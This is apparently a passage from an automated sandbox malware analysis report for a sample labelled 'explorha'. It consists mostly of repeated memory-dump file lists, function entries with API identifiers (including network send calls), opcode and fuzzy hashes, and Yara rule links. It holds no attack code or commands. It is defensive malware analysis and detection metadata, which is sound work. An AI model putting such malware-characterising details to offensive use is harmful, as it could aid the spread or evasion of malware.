                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131500106.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131526562.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131553521.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131576497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131600115.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131626714.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131653420.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131750216.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131815918.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131876230.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131903531.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131929428.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131983084.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2132009698.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Mtx_unlock
                                                                                                                                                                                                                                        • String ID: invalid stoi argument$stoi argument out of range$Sv
                                                                                                                                                                                                                                        • API String ID: 1418687624-3838638389
                                                                                                                                                                                                                                        • Opcode ID: 182fa26ae1d8ef14e30b0819533092e644fa9997e2d82e6fca8a21feba365f0a
                                                                                                                                                                                                                                        • Instruction ID: 0584fe80cce110151903f1fed53c43b1be9808775ee1e71ae03a05098a947faa
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 182fa26ae1d8ef14e30b0819533092e644fa9997e2d82e6fca8a21feba365f0a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B1182B2A00305DBCF30DFA8D846AA9F3F1EF54311F168565E906676A1EB39AC40CB51
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0073E110 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130649596.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130672754.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130744577.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130767970.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130792007.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130815173.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130838465.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130944623.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130968284.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130992106.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131015605.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131088103.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131112645.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131137331.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131162505.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131193467.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131218609.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131242429.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131268887.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131300586.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131327253.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131350972.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131375198.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131401886.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131426997.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131452167.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131475821.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131500106.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131526562.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131553521.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131576497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131600115.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131626714.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131653420.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131750216.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131815918.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131876230.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131903531.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131929428.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131983084.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2132009698.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _strrchr
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3213747228-0
                                                                                                                                                                                                                                        • Opcode ID: b713bfd49b51041abb555fe8b87117765181b7de4fabe3ba4743ab7c7481a45c
                                                                                                                                                                                                                                        • Instruction ID: dcea59b335d4bbad62b031148a89944bf090b059d51f7f88ee544913292c86cc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b713bfd49b51041abb555fe8b87117765181b7de4fabe3ba4743ab7c7481a45c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89B12732900695DFEB15CF68C881BAEBBE5EF55300F24816AE855DB383D63C9D01CB61
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0070D2DC Relevance: 6.2, APIs: 4, Instructions: 168networkCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • send.WS2_32(?,?,00000004,00000000), ref: 0070D43E
                                                                                                                                                                                                                                        • send.WS2_32(?,?,00000008,00000000), ref: 0070D47A
                                                                                                                                                                                                                                        • send.WS2_32(?,?,?,00000000), ref: 0070D4BC
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130649596.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130672754.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130744577.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130767970.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130792007.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130815173.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130838465.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130944623.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130968284.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130992106.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131015605.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131088103.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131112645.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131137331.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131162505.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131193467.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131218609.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131242429.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131268887.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131300586.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131327253.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131350972.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131375198.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131401886.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131426997.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131452167.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131475821.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131500106.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131526562.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131553521.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131576497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131600115.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131626714.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131653420.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131750216.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131815918.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131876230.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131903531.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131929428.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131983084.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2132009698.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: send
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2809346765-0
                                                                                                                                                                                                                                        • Opcode ID: c12e74bb71e80b5cbba7453acb98be12fd41cb6e18e09374fa949a458735cc21
                                                                                                                                                                                                                                        • Instruction ID: de6d1e44175e4cde55b6a2ad460fe1b4b71adf537b0e39bf1d63b82ca77bd574
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c12e74bb71e80b5cbba7453acb98be12fd41cb6e18e09374fa949a458735cc21
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7241D872E00214DBDB288BBCDC957AEB7B4AF45324F104369EC19E33D1DA38AD408B95
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0071D202 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130649596.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130672754.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130744577.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130767970.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130792007.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130815173.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130838465.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130944623.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130968284.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130992106.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131015605.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131088103.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131112645.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131137331.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131162505.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131193467.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131218609.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131242429.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131268887.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131300586.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131327253.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131350972.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131375198.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131401886.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131426997.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131452167.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131475821.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131500106.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131526562.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131553521.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131576497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131600115.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131626714.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131653420.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131750216.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131815918.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131876230.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131903531.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131929428.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131983084.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2132009698.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 531285432-0
                                                                                                                                                                                                                                        • Opcode ID: 880257fb6015feed8a9167f03d418d4b7af9960ec41e864ab11c5b83646c3ac4
                                                                                                                                                                                                                                        • Instruction ID: 3ace18804f7452dd607bd0150a9767cece3538ce40f37e3bfa77f63bba975bd4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 880257fb6015feed8a9167f03d418d4b7af9960ec41e864ab11c5b83646c3ac4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25212C75A00219EFDF10EFA8DC859EEBBB9BF49314F100055F901A7291D6789E819BA1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0074097F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130649596.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130672754.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130744577.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130767970.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130792007.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130815173.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130838465.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130944623.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130968284.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130992106.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131015605.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131088103.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131112645.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131137331.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131162505.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131193467.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131218609.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131242429.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131268887.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131300586.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131327253.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131350972.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131375198.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131401886.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131426997.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131452167.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
